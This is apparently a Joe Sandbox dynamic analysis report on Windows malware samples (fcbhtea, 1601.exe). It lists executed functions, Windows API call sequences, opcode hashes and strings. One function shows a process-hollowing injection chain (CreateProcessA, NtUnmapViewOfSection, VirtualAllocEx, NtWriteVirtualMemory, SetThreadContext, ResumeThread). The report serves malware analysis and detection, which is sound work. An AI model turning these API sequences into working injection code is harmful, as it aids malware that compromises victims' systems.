CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02EDB43F
Module32First.KERNEL32(00000000,00000224), ref: 02EDB45F

Memory Dump Source

Source File: 00000004.00000002.1682669185.0000000002ED8000.00000040.00000020.00020000.00000000.sdmp, Offset: 02ED8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ed8000_fcbhtea.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7d4f513bd8fa5eeed82dc2b91083c76f656f2c3f80345a3b205f1a501609ca1b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EEF0C2322407106BD7206BF5A88CB6F72E8AF5822CF15952CE642915C0FB70F8064A60

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CF0223,?,?), ref: 02CF0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CF0223,?,?), ref: 02CF0E1E

Memory Dump Source

Source File: 00000004.00000002.1682340416.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cf0000_fcbhtea.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f40b6a7c0d257f705cb0e7d4435728bf201dbb2aa5362d75ca5dd7b1c55b98c4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 97D01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019CC Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004019BE Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004019CF Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B

Uniqueness

Uniqueness Score: -1.00%

Function 02EDB0D6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02EDB127

Memory Dump Source

Source File: 00000004.00000002.1682669185.0000000002ED8000.00000040.00000020.00020000.00000000.sdmp, Offset: 02ED8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ed8000_fcbhtea.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 025bf637e67bb2058570139860109e4184471d49414fe69a6b268d6fa02cbc4f
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 62113C79A40208EFDB01DF98C985E99BBF5AF08350F05C095F9489B361D371EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004019E7 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1680345151.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_fcbhtea.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1601.exePID: 8176, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	28.9%
Total number of Nodes:	38
Total number of Limit Nodes:	8

Executed Functions

Function 04950110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 04950156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0495016C
CreateProcessA.KERNELBASE(?,00000000), ref: 04950255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04950270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 04950283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0495029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 049502C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 049502E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 04950304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0495032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 04950399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 049503BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 049503E1
ResumeThread.KERNELBASE(00000000), ref: 049503ED
ExitProcess.KERNEL32(00000000), ref: 04950412

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 4205035bb8b72203624cc845657c6b6e2389775f6250ca401c74c4facca41f57
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: E8B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04950420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 04950533

Strings

mfoaskdfnoa, xrefs: 04950520, 04950523
d, xrefs: 04950584
0, xrefs: 04950492
saodkfnosa9uin, xrefs: 049504DA

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 01a8a50b971bf3d56b414e8a1a1e8994baf6f7e47c21bab0065004bc1be9f994
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: A9513B70D08388DEEB11CBE8C849BDDBFB66F11708F244058D5447F296C3BA6659CB62

Uniqueness

Uniqueness Score: -1.00%

Function 049505B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 049505EC

Strings

o, xrefs: 04950600
apfHQ, xrefs: 049505E2, 049505E5

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 06d176c50bc9b416346f4df688a7a3f44af9bd7fea4e9759c7e90128c057cf03
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 29011E70C0524CEADB10DF98C5183AEBFB5AF41308F1481A9C8092B252D7769B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 048B57C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 048B57EE
Module32First.KERNEL32(00000000,00000224), ref: 048B580E

Memory Dump Source

Source File: 00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp, Offset: 048B5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b5000_1601.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d87b0360359651dbf9c0aa1b143f61c502438733669c321fc14adc78e696ca59
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A4F06232200710BFD7203BB9A88DAAF76ECEF49729F140A28E6D2D15C0DB70F94546A5

Uniqueness

Uniqueness Score: -1.00%

Function 048B5485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 048B54D6

Memory Dump Source

Source File: 00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp, Offset: 048B5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b5000_1601.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: aa090a3eb9c343b6df2f55e3438cf76da7c6d4063bd550ac36649a268b953706
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B0112B79A00208FFDB01DF98C985E99BBF5AF08351F058094F9889B361D371EA90DB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0496F030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0496F0A7
_wcsstr.LIBCMT ref: 0496F14E
_strstr.LIBCMT ref: 0496F3D6
_malloc.LIBCMT ref: 0496F526
_memset.LIBCMT ref: 0496F534
_strstr.LIBCMT ref: 0496F57A
_malloc.LIBCMT ref: 0496F6F5
_memset.LIBCMT ref: 0496F703
_free.LIBCMT ref: 0496F7B5
_free.LIBCMT ref: 0496F7C2

Strings

", xrefs: 0496F640

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _memset$_free_malloc_strstr$_wcsstr
String ID: "
API String ID: 430003804-123907689
Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
Instruction ID: 31a5e4c70143d51debfcfd236879b7254c46699450f8ecf76aef72cf4e51dc2d
Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
Instruction Fuzzy Hash: F442B371508341ABEB20DF64DC48B9B7BE8BF85308F04093DF98A97191DB75E509CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0496A930 Relevance: 10.3, APIs: 3, Strings: 2, Instructions: 1565COMMON

Download Yara Rule

Strings

x2Q, xrefs: 0496B1F6
<, xrefs: 0496B01B

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: _memset
String ID: <$x2Q
API String ID: 2102423945-643667464
Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
Instruction ID: 442be542fc78b9f40f04f5ba22f6b8aa7a35b440902c7b0b5f2254f04a6b8412
Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
Instruction Fuzzy Hash: 8FD2B171604341AFE724EF64D894B9FB7E9BF85308F40493DE88697290EB71B509CB92

Uniqueness

Uniqueness Score: -1.00%

Function 049600D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
Instruction ID: 42494f3ef729cbcf2de98ced8eb66a1ad7398a4795966aa866b922bf266fddba
Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
Instruction Fuzzy Hash: EB526E71D00209DBEF10DFA8C885BDEBBF5BF44308F548579D41AA7290E735AA49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0495E6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON

Download Yara Rule

APIs

_wcsstr.LIBCMT ref: 0495E72D
_wcsstr.LIBCMT ref: 0495E756
_memset.LIBCMT ref: 0495E784

Part of subcall function 0499FC0C: std::exception::exception.LIBCMT ref: 0499FC1F
Part of subcall function 0499FC0C: __CxxThrowException@8.LIBCMT ref: 0499FC34
Part of subcall function 0499FC0C: std::exception::exception.LIBCMT ref: 0499FC4D
Part of subcall function 0499FC0C: __CxxThrowException@8.LIBCMT ref: 0499FC62
Part of subcall function 0499FC0C: std::regex_error::regex_error.LIBCPMT ref: 0499FC74
Part of subcall function 0499FC0C: __CxxThrowException@8.LIBCMT ref: 0499FC82
Part of subcall function 0499FC0C: std::exception::exception.LIBCMT ref: 0499FC9B
Part of subcall function 0499FC0C: __CxxThrowException@8.LIBCMT ref: 0499FCB0

_wcsstr.LIBCMT ref: 0495EA0C
_memset.LIBCMT ref: 0495EE5C

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
String ID:
API String ID: 1338678108-0
Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction ID: b9b0775a8377bce289c78732fdf6eb84daad86b7db370899c72b2f16cceaadfc
Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction Fuzzy Hash: 9352C071E002199FDF24CF68C894BAEBBF5BF44304F244579EC46AB291D732AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04960B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
Instruction ID: a39d1a4df8d5447ffe477d480526de6e89a7894a28a75a10ba2837deefba1bee
Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
Instruction Fuzzy Hash: 93427A70D00219EBDF14DFA8C889BDEB7F5BF04308F604579D41AA7290EB31AA45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0495DBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 02cc20a8977898e341a02a2e1a0d5867b9b86392657e615a08e947dd3dfa6d6f
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 02526571E00209DFDB50DFA4C854FAEBBB5BF45704F2485A8E909AB260DB71BE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 049D22C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

$, xrefs: 049D291E

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: d522123316a9fa0d7656188325496d786dd70a9d107a98aafa39769e13bc234f
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 0F3251B0E002299EEF619F64CC44BAEB7B9FF45704F1041FAE64CA6190DB749A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 04955DF7 Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
Instruction ID: d7c562b810d8cb804405f2b035d7aa5887dd0abb5dbdc442657b0d4da06a8913
Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
Instruction Fuzzy Hash: 0642BF71629F159BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0495A026 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
Instruction ID: 57d44356385f8f4edb0f6c843886ae0b0c44cb6aed5ce288af1e739fc50a5202
Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
Instruction Fuzzy Hash: 3122E176504B029FC714CF29D08055AF7E1FF88324F258A6EE8A9A7B10D730BA55CF85

Uniqueness

Uniqueness Score: -1.00%

Function 04952B60 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80

Uniqueness

Uniqueness Score: -1.00%

Function 04953520 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
Instruction ID: 982fb098c2b893eb99e726c784a403e3f627bc5b772128c882125bb0b0ffcd8b
Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
Instruction Fuzzy Hash: EE025B715187058FC766EE0CD49035AF3E1FFC8305F198A3DDA8987A64E739A9198F82

Uniqueness

Uniqueness Score: -1.00%

Function 049589D0 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
Instruction ID: 7f2aaec913646113fd9e142faa2b2344f5ec5623e8ef638a87b597ca40bc7408
Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
Instruction Fuzzy Hash: 87C12833E2477906D764DEAE8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0

Uniqueness

Uniqueness Score: -1.00%

Function 0495B0B0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction ID: 43daaaa032c0362f292cbe7d4ec2830f9e4ea8fd8cac55e98c7373247ff8d0ca
Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction Fuzzy Hash: 11A1EC0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50

Uniqueness

Uniqueness Score: -1.00%

Function 049530F0 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4950000_1601.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680

Uniqueness

Uniqueness Score: -1.00%

